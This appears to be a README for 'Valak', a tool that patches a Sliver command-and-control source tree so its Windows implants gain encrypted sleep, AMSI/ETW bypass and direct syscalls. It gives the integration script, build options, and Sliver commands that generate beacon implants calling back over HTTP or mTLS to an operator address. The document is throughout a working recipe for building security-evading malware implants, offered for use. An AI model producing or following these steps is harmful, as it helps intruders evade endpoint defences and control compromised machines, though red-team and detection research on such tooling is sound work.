1.9 KiB
1.9 KiB
Valak + Sliver integration
One script. Three prereqs. Your implant walks out with ChaCha20-encrypted sleep, HWBP AMSI/ETW bypass, and FreshyCalls syscalls.
prereqs
- Zig — any build targeting
x86_64-windows(Linux zig or Windows zig via WSL) - Go 1.21+ — with a Sliver source clone on disk
- python3 — used by the embed script
usage
from the Valak repo root, point it at your Sliver clone:
./scripts/integrate.sh ~/projects/sliver
that builds the DLL, embeds it, patches runner.go, and verifies the patches
compile. The actual implant is generated from sliver-server (see below).
options
| flag | what it does |
|---|---|
--skip-build |
patch only, don't build the implant |
ZIG=/path/to/zig |
use a specific zig binary (e.g. Windows zig from WSL) |
examples:
# patch only
./scripts/integrate.sh ~/projects/sliver --skip-build
# windows zig on WSL
ZIG=/mnt/c/Zig/zig.exe ./scripts/integrate.sh ~/projects/sliver
generating the implant
after the script patches your clone, generate the implant from sliver-server:
# start sliver
sliver-server
# on the server REPL:
sliver > profiles new --beacon --http <YOUR_IP> valak
sliver > generate --profile valak --save /tmp/valak.exe
# or with mtls:
sliver > generate --mtls <YOUR_IP> --save /tmp/valak.exe
the generated binary includes Valak's encrypted sleep, AMSI/ETW bypass, and
FreshyCalls syscalls automatically. The patched runner.go is inherited
through Sliver's template processing.
idempotent
running the script twice on the same clone is safe — it detects existing patches and skips them.
notes
- beacon mode only — encrypted sleep hooks
beaconMainLoop. Session mode blocks on connection receive, so evasion there is AMSI/ETW bypass and FreshyCalls only. - one-time init —
Bootstrap()goes inbeaconMainLoop(runs once per beacon connection), notbeaconMain(runs every check-in).